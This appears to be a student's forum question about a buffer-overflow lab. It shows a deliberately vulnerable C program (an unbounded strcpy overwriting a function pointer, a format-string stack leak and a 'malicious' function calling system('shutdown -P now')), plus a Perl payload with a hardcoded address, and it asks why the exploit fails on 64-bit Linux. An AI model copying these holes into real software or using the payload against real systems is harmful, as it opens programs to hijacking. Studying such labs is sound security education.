I have two scripts, one in C and one in Perl. The C code is:

    #pragma check_stack(off)
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>   /* declares system() */

    void good_fn(){
        printf("GOOD CODE \n");
    }

    void mlc_fn(){
        printf("What is this I don understand what has happened !Probably buffer overflow attack and m hacked \n");
        system("shutdown -P now");
    }

    int main(int argc, char* argv[]){
        printf("Address of GOOD_CODE = %p\n", good_fn);
        printf("Address of MLIC_CODE = %p\n", mlc_fn);
        char data[10];
        // Calling function by pointer
        void (*dsrd_fn)();
        dsrd_fn = &good_fn;
        printf("SIZE : %zu\n", sizeof(dsrd_fn));
        // try to overflow dsrd_fn here (unbounded copy, intentionally unsafe)
        strcpy(data, argv[1]);
        // load content from file
        printf("Address of dsrd_fn = %p\n", dsrd_fn);
        // call fn based on address pntr_fn
        dsrd_fn();
        // no arguments are passed on purpose: each %p prints whatever sits where an argument would be
        printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
    }
And the Perl code is:

    $arg = "AAAAAAAAAA"."\xC1\x84\x04\x08";
    $cmd = "./bo_test ".$arg;
    system($cmd);
After compiling and testing bo_test, the output is:

    student@EECS-337-VM:~/EECS 397/Part 2$ ./bo_test abcde
    Address of GOOD_CODE = 0x40060d
    Address of MLIC_CODE = 0x40061d
    SIZE : 8
    Address of dsrd_fn = 0x40060d
    GOOD CODE
    My stack looks like:
    0x7f00b3974000
    0x7f00b37509e0
    0xffffffffffffffff
    0x7f00b37509e0
    (nil)
    0x7fff66218a68
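
When I put MLIC_ADDR into the Perl script, the shell-code buffer overflow exploit using the Perl script does not work on a 64-bit Linux system, but it does work on a 32-bit Linux system. Why is that?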